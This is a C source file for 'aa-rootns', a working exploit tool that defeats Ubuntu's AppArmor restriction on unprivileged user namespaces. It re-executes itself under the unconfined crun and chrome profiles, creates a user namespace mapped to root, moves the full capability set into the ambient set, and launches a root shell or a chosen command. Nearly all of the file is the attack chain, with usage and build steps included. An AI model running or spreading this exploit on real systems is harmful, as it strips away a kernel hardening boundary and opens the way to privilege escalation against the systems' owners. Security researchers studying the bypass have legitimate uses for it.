/*
 * aa-rootns — defeat Resolute apparmor unprivileged_userns cap-strip
 *             and drop the caller into a userns with full caps.
 *
 * Why this is needed:
 *   Ubuntu Resolute (24.04+) ships  kernel.apparmor_restrict_unprivileged_userns=1
 *   and the unprivileged_userns AppArmor profile, which together strip all
 *   effective caps the moment an unprivileged user creates a userns. That
 *   was supposed to defang the long-standing "userns LPE primitive" class.
 *
 *   It does not, because Ubuntu also ships /etc/apparmor.d/{crun,chrome},
 *   both of which are flags=(unconfined) and grant the userns rule. Both
 *   are reachable by any unprivileged user via /proc/self/attr/exec, and
 *   neither strips caps when the resulting profile creates a userns.
 *
 * Recipe:
 *   stage 0: change_onexec(crun);       execv self
 *   stage 1: change_onexec(chrome);     execv self
 *   stage 2: unshare(CLONE_NEWUSER); write uid_map / gid_map; we are
 *            now euid=0 inside the new userns and (because chrome is
 *            unconfined) keep the full cap bitmap. Launder Permitted
 *            into Inheritable, then raise into Ambient so the caps
 *            survive the next execv. Then exec the user-supplied
 *            target (bash by default) inside the userns.
 *
 * Usage:
 *   ./aa-rootns                  # drops into root /bin/bash inside userns
 *   ./aa-rootns -p               # print proof and exit
 *   ./aa-rootns -- cmd args...   # run cmd inside the userns
 *   ./aa-rootns -n -- cmd args   # also unshare(NEWNET) before execing cmd
 *
 * Build:  gcc -O2 -Wall -o aa-rootns aa-rootns.c
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <linux/capability.h>

/* ─── primitives ─────────────────────────────────────────────── */

/*
 * Ask AppArmor to switch this task to `profile` at its next exec by writing
 * "exec <profile>" to /proc/self/attr/exec.
 *
 * Returns 0 on success, -1 on failure with errno set:
 *   ENAMETOOLONG  the request does not fit the local buffer
 *   EIO           only part of the request was written
 *   otherwise     whatever open(2) / write(2) reported
 */
static int change_onexec(const char *profile) {
    char req[256];
    int len = snprintf(req, sizeof req, "exec %s", profile);
    /* snprintf returns the untruncated length; writing that many bytes
     * from a truncated buffer would read past its end. */
    if (len < 0 || (size_t)len >= sizeof req) {
        errno = ENAMETOOLONG;
        return -1;
    }

    int fd = open("/proc/self/attr/exec", O_WRONLY);
    if (fd < 0) return -1;

    ssize_t wrote = write(fd, req, (size_t)len);
    /* A short write leaves errno untouched, so give it a meaningful value;
     * capture it before close() can overwrite it. */
    int saved = (wrote >= 0 && wrote != len) ? EIO : errno;
    close(fd);

    if (wrote == len) return 0;
    errno = saved;
    return -1;
}

/*
 * Best-effort write of the NUL-terminated string `c` to the existing file
 * `p` (opened write-only, neither created nor truncated). Open and write
 * failures are deliberately ignored; nothing is reported to the caller.
 */
static void wfile(const char *p, const char *c) {
    int fd = open(p, O_WRONLY);
    if (fd >= 0) {
        size_t len = strlen(c);
        ssize_t ignored = write(fd, c, len);
        (void)ignored;
        close(fd);
    }
}

/*
 * Translate a capability number into its lower-case name without the
 * "cap_" prefix. Numbers outside the table (negative or past the last
 * entry) yield "?".
 */
static const char *cap_name(int c) {
    static const char *const table[] = {
        /*  0 */ "chown", "dac_override", "dac_read_search", "fowner",
        /*  4 */ "fsetid", "kill", "setgid", "setuid",
        /*  8 */ "setpcap", "linux_immutable", "net_bind_service", "net_broadcast",
        /* 12 */ "net_admin", "net_raw", "ipc_lock", "ipc_owner",
        /* 16 */ "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace",
        /* 20 */ "sys_pacct", "sys_admin", "sys_boot", "sys_nice",
        /* 24 */ "sys_resource", "sys_time", "sys_tty_config", "mknod",
        /* 28 */ "lease", "audit_write", "audit_control", "setfcap",
        /* 32 */ "mac_override", "mac_admin", "syslog", "wake_alarm",
        /* 36 */ "block_suspend", "audit_read", "perfmon", "bpf",
        /* 40 */ "checkpoint_restore",
    };
    enum { TABLE_LEN = sizeof table / sizeof table[0] };

    if (c < 0 || c >= TABLE_LEN)
        return "?";
    return table[c];
}

/*
 * Print this process's effective, permitted and inheritable capability
 * sets to stderr, prefixed with `tag`. Each set is shown as two 32-bit hex
 * words, high word first. The capget result is not checked, so a failed
 * call prints the zero-initialised sets.
 */
static void dump_caps(const char *tag) {
    struct __user_cap_header_struct hdr = {
        .version = _LINUX_CAPABILITY_VERSION_3,
        .pid = 0,
    };
    struct __user_cap_data_struct sets[2] = {0};
    const struct __user_cap_data_struct *lo = &sets[0];
    const struct __user_cap_data_struct *hi = &sets[1];

    syscall(SYS_capget, &hdr, sets);

    fprintf(stderr, "[%s] capE=%08x_%08x  capP=%08x_%08x  capI=%08x_%08x\n",
        tag,
        hi->effective, lo->effective,
        hi->permitted, lo->permitted,
        hi->inheritable, lo->inheritable);
}

/*
 * Print the contents of /proc/self/attr/current (cut at the first newline)
 * together with the real and effective uid to stderr, prefixed with `tag`.
 * Prints nothing when the file cannot be opened or yields no data.
 */
static void dump_label(const char *tag) {
    char label[256] = {0};

    int fd = open("/proc/self/attr/current", O_RDONLY);
    if (fd < 0)
        return;

    /* One byte is held back so the zero-filled buffer stays terminated. */
    ssize_t got = read(fd, label, sizeof label - 1);
    if (got > 0) {
        label[strcspn(label, "\n")] = '\0';
        fprintf(stderr, "[%s] aa=%s uid=%d euid=%d\n", tag, label, getuid(), geteuid());
    }
    close(fd);
}

/* ─── stages ─────────────────────────────────────────────────── */

/* Command-line switches; file-scope statics start out as 0. */
static int verbose;           /* -v: trace each stage on stderr */
static int print_proof;       /* -p: print ids, caps and ns probes, then exit */
static int also_unshare_net;  /* -n: unshare(CLONE_NEWNET) before the exec */
static int interactive;       /* -i: run /bin/bash (also the default target) */

/* Prefix of the argv[1] marker that tells a re-exec'd copy which stage to run. */
#define STAGE_TAG "AA-ROOTNS-STAGE-"

/*
 * Stage 0: request the "crun" profile for the next exec, then re-exec this
 * binary with the stage-1 marker inserted as argv[1] and the caller's
 * arguments shifted up by one.
 *
 * Returns 1 on any failure; does not return on success.
 */
static int do_stage0(int argc, char **argv) {
    if (verbose) dump_label("s0");
    if (change_onexec("crun") < 0) {
        fprintf(stderr, "change_onexec(crun): %s\n", strerror(errno));
        fprintf(stderr, "(does /etc/apparmor.d/crun exist? is apparmor active?)\n");
        return 1;
    }

    /* Slots: argv[0], the stage marker, argv[1..argc-1], terminating NULL
     * (calloc supplies the NULL). */
    char **a = calloc((size_t)argc + 2, sizeof *a);
    if (!a) {
        perror("calloc");
        return 1;
    }
    a[0] = argv[0];
    a[1] = (char *)STAGE_TAG "1";
    for (int i = 1; i < argc; i++) a[i + 1] = argv[i];

    execv("/proc/self/exe", a);
    perror("execv s1");   /* report before free() can disturb errno */
    free(a);
    return 1;
}

/*
 * Stage 1: request the "chrome" profile for the next exec, rewrite the
 * argv[1] marker to stage 2 and re-exec this binary with the same vector.
 *
 * Returns 1 on any failure; does not return on success.
 */
static int do_stage1(int argc, char **argv) {
    if (verbose)
        dump_label("s1");

    int rc = change_onexec("chrome");
    if (rc < 0) {
        fprintf(stderr, "change_onexec(chrome): %s\n", strerror(errno));
        return 1;
    }

    /* The incoming vector is reused in place; only the marker slot changes. */
    argv[1] = (char *)STAGE_TAG "2";
    execv("/proc/self/exe", argv);

    /* Reached only when execv failed. */
    perror("execv s2");
    return 1;
}

static int do_stage2(int argc, char **argv) {
    if (verbose) dump_label("s2-entry");
    uid_t ruid = getuid(); gid_t rgid = getgid();

    if (unshare(CLONE_NEWUSER) < 0) {
        perror("unshare(CLONE_NEWUSER)");
        fprintf(stderr, "(is sysctl kernel.unprivileged_userns_clone=0? "
                        "or is the chrome profile patched?)\n");
        return 1;
    }
    wfile("/proc/self/setgroups", "deny");
    {
        char b[64]; snprintf(b, sizeof b, "0 %u 1", ruid);
        wfile("/proc/self/uid_map", b);
        snprintf(b, sizeof b, "0 %u 1", rgid);
        wfile("/proc/self/gid_map", b);
    }
    (void)!setresuid(0, 0, 0);
    (void)!setresgid(0, 0, 0);

    if (verbose) {
        dump_label("s2-postuser");
        dump_caps("s2-postuser");
    }

    /* Permitted → Inheritable, then raise everything we can into Ambient
     * so caps survive the upcoming execv into the target.
     */
    struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2] = {0};
    syscall(SYS_capget, &h, d);
    d[0].inheritable = d[0].permitted;
    d[1].inheritable = d[1].permitted;
    if (syscall(SYS_capset, &h, d) < 0) perror("capset I=P");

    int raised = 0;
    for (int c = 0; c < 64; c++)
        if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0) == 0) raised++;
    if (verbose)
        fprintf(stderr, "[s2] raised %d caps into Ambient\n", raised);

    if (also_unshare_net) {
        if (unshare(CLONE_NEWNET) < 0) {
            perror("unshare(NET)"); return 1;
        }
        if (verbose) fprintf(stderr, "[s2] unshare(NET) ok\n");
    }

    /* Find argv[i] == "--", everything past that is the target argv */
    int sep = -1;
    for (int i = 2; i < argc; i++) if (!strcmp(argv[i], "--")) { sep = i; break; }

    if (print_proof) {
        printf("=== aa-rootns proof ===\n");
        printf("uid=%d euid=%d gid=%d egid=%d\n", getuid(), geteuid(), getgid(), getegid());
        struct __user_cap_header_struct hh = { _LINUX_CAPABILITY_VERSION_3, 0 };
        struct __user_cap_data_struct dd[2] = {0};
        syscall(SYS_capget, &hh, dd);
        unsigned long long e = ((unsigned long long)dd[1].effective << 32) | dd[0].effective;
        unsigned long long p = ((unsigned long long)dd[1].permitted << 32) | dd[0].permitted;
        printf("cap_effective=0x%016llx\n", e);
        printf("cap_permitted=0x%016llx\n", p);
        printf("caps held:\n");
        for (int c = 0; c < 41; c++)
            if ((e >> c) & 1) printf("    CAP_%s\n", cap_name(c));
        printf("ns-cap probes:\n");
        if (unshare(CLONE_NEWNET) == 0)      printf("    unshare(NEWNET)  ok (CAP_SYS_ADMIN inside userns)\n");
        else                                 printf("    unshare(NEWNET)  FAIL  %s\n", strerror(errno));
        if (unshare(CLONE_NEWUTS) == 0)      printf("    unshare(NEWUTS)  ok\n");
        if (unshare(CLONE_NEWNS)  == 0)      printf("    unshare(NEWNS)   ok\n");
        if (unshare(CLONE_NEWPID) == 0)      printf("    unshare(NEWPID)  ok\n");
        if (unshare(CLONE_NEWIPC) == 0)      printf("    unshare(NEWIPC)  ok\n");
        return 0;
    }

    char **target_argv;
    if (sep > 0 && sep + 1 < argc) {
        target_argv = &argv[sep + 1];
    } else if (interactive) {
        static char *bargv[] = { (char *)"/bin/bash", NULL };
        target_argv = bargv;
    } else {
        static char *bargv[] = { (char *)"/bin/bash", NULL };
        target_argv = bargv;
    }
    execvp(target_argv[0], target_argv);
    perror("execvp target");
    return 1;
}

/* ─── entry ──────────────────────────────────────────────────── */

/* Print the command-line synopsis for program name `p` to stderr. */
static void usage(const char *p) {
    static const char option_help[] =
        "  -v   verbose stage tracing\n"
        "  -p   print proof of caps + ns-cap probes, then exit\n"
        "  -n   also unshare(CLONE_NEWNET) before exec\n"
        "  -i   interactive bash inside the userns (default)\n"
        "  --   end of options; exec the rest as the target\n";

    fprintf(stderr, "usage: %s [-v] [-p] [-n] [-i] [-- cmd args...]\n", p);
    fputs(option_help, stderr);
}

/*
 * Entry point. A re-exec'd copy is recognised by the stage marker in
 * argv[1] and dispatched straight to that stage; otherwise the options are
 * validated and stage 0 starts the chain.
 *
 * Exit status: 0 for -h/--help, 2 for an unknown option, otherwise the
 * status of the stage that ran.
 */
int main(int argc, char **argv) {
    /* If we are being re-entered for stage1 / stage2, dispatch immediately
     * before option parsing (stages pass through the original argv).
     */
    if (argc >= 2) {
        int stage = 0;
        if (!strcmp(argv[1], STAGE_TAG "1")) stage = 1;
        else if (!strcmp(argv[1], STAGE_TAG "2")) stage = 2;

        if (stage) {
            /* Options sit between the marker and "--". Anything after "--"
             * belongs to the target and must not be read as our flags. */
            for (int i = 2; i < argc; i++) {
                if (!strcmp(argv[i], "--")) break;
                if (!strcmp(argv[i], "-v")) verbose = 1;
                else if (stage == 2) {
                    /* Only stage 2 acts on the remaining switches. */
                    if (!strcmp(argv[i], "-p")) print_proof = 1;
                    else if (!strcmp(argv[i], "-n")) also_unshare_net = 1;
                    else if (!strcmp(argv[i], "-i")) interactive = 1;
                }
            }
            return stage == 1 ? do_stage1(argc, argv) : do_stage2(argc, argv);
        }
    }

    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-h") || !strcmp(argv[i], "--help")) { usage(argv[0]); return 0; }
        else if (!strcmp(argv[i], "-v")) verbose = 1;
        else if (!strcmp(argv[i], "-p")) print_proof = 1;
        else if (!strcmp(argv[i], "-n")) also_unshare_net = 1;
        else if (!strcmp(argv[i], "-i")) interactive = 1;
        else if (!strcmp(argv[i], "--")) break;
        else { fprintf(stderr, "unknown option: %s\n", argv[i]); usage(argv[0]); return 2; }
    }

    return do_stage0(argc, argv);
}
